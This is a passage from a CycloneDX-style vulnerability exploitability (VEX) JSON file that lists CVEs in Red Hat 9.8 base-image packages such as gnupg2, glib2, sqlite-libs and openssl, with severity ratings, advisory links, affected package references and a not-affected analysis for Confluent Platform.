              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-68972",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        347
      ],
      "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68972"
        },
        {
          "url": "https://github.com/advisories/GHSA-w789-3q45-984r"
        },
        {
          "url": "https://gpg.fail/formfeed"
        },
        {
          "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"
        },
        {
          "url": "https://news.ycombinator.com/item?id=46404339"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
        }
      ],
      "published": "2025-12-27T23:15:40+00:00",
      "updated": "2026-06-17T09:59:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-7039",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-7039"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-7039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
        }
      ],
      "published": "2025-09-03T02:15:38+00:00",
      "updated": "2026-06-17T10:04:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-70873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        244
      ],
      "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-70873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-70873"
        },
        {
          "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873"
        },
        {
          "url": "https://sqlite.org/forum/forumpost/761eac3c82"
        },
        {
          "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
        }
      ],
      "published": "2026-03-12T19:16:15+00:00",
      "updated": "2026-06-17T10:03:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.34.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-9232",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: An application using the OpenSSL HTTP client API functions may\ntrigger an out-of-bounds read if the 'no_proxy' environment variable is set and\nthe host portion of the authority component of the HTTP URL is an IPv6 address.\n\nImpact summary: An out-of-bounds read can trigger a crash which leads to\nDenial of Service for an application.\n\nThe OpenSSL HTTP client API functions can be used directly by applications\nbut they are also used by the OCSP client functions and CMP (Certificate\nManagement Protocol) client implementation in OpenSSL. However the URLs used\nby these implementations are unlikely to be controlled by an attacker.\n\nIn this vulnerable code the out of bounds read can only trigger a crash.\nFurthermore the vulnerability requires an attacker-controlled URL to be\npassed from an application to the OpenSSL function and the user has to have\na 'no_proxy' environment variable set. For the aforementioned reasons the\nissue was assessed as Low severity.\n\nThe vulnerable code was introduced in the following patch releases:\n3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.\n\nThe FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this\nissue, as the HTTP client implementation is outside the OpenSSL FIPS module\nboundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-9232"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/09/30/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-9232"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-585531.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-76r2-c3cg-f5r9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9232"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250930.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7786-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
        }
      ],
      "published": "2025-09-30T14:15:41+00:00",
      "updated": "2026-07-14T13:18:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-5.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/openssl@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/openssl-libs@3.5.5-5.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
